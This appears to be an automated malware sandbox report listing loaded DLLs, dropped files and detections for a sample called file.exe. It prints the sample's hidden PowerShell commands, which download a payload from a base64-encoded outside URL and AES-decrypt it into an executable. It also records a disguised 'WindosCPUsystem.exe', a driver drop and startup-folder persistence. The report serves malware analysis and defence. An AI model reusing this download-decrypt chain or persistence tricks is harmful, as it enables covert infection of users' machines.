                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                    Source: C:\Windows\explorer.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                    Source: C:\Windows\explorer.exeSection loaded: msi.dll
                    Source: C:\Windows\explorer.exeSection loaded: winmm.dll
                    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dll
                    Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: mozglue.dll
                    Source: C:\Windows\explorer.exeSection loaded: wsock32.dll
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\explorer.exeSection loaded: webio.dll
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\explorer.exeSection loaded: schannel.dll
                    Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: apphelp.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: wininet.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: mscoree.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\explorer.exeSection loaded: amsi.dll
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                    Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: wininet.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: mscoree.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'@{# Script module or binary module file associated wi
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                    Source: file.exeStatic PE information: section name: .code
                    Source: WindosCPUsystem.exe.16.drStatic PE information: section name: .xdata
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000000014001BD2E push rbx; ret 0_2_000000014001BD2F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B890DD8 push E85F4A10h; ret 7_2_00007FFD9B890DF9
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0032B1A5 push ecx; ret 13_2_0032B1B8
                    Source: C:\Windows\explorer.exeCode function: 18_2_0232D150 push rbp; retf 18_2_0232D151
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6951A21 push dword ptr [00006C01h]; ret 19_2_0000016DE6951A90
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6951DB5 push FF480027h; retf 19_2_0000016DE6951DBA
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE86C1394 push dword ptr [00006C01h]; ret 19_2_0000016DE86C1403
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677AB41A21 push dword ptr [00006C01h]; ret 31_2_000001677AB41A90
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677AB41DB5 push FF480027h; retf 31_2_000001677AB41DBA
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677C7E1394 push dword ptr [00006C01h]; ret 31_2_000001677C7E1403

                    Persistence and Installation Behavior

                    barindex
                    Sample is not signed and drops a device driver
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeFile created: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\downloaded_file.exeJump to dropped file
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeFile created: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sysJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeJump to dropped file
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C1000 GetCommandLineW,CommandLineToArgvW,ExitProcess,RegGetValueW,ExitProcess,OpenEventW,ExitProcess,SetEvent,CloseHandle,ExitProcess,CreateMutexExW,ExitProcess,CreateEventW,ExitProcess,OpenMutexW,ExitProcess,CreateThread,ExitProcess,WaitForMultipleObjects,WaitForSingleObject,ExitProcess,18_2_022C1000
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C34B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,18_2_022C34B0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022CAF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,18_2_022CAF00

                    Boot Survival

                    barindex
                    Drops script or batch files to the startup folder
                    Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.batJump to dropped file
                    Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.batJump to behavior
                    Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.batJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00318110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,13_2_00318110
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{BB52E685-57DB-490D-A4DD-CCF2F7D90D58} {2DD5D29F-1CE3-49E7-8572-9D856412ED59}Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
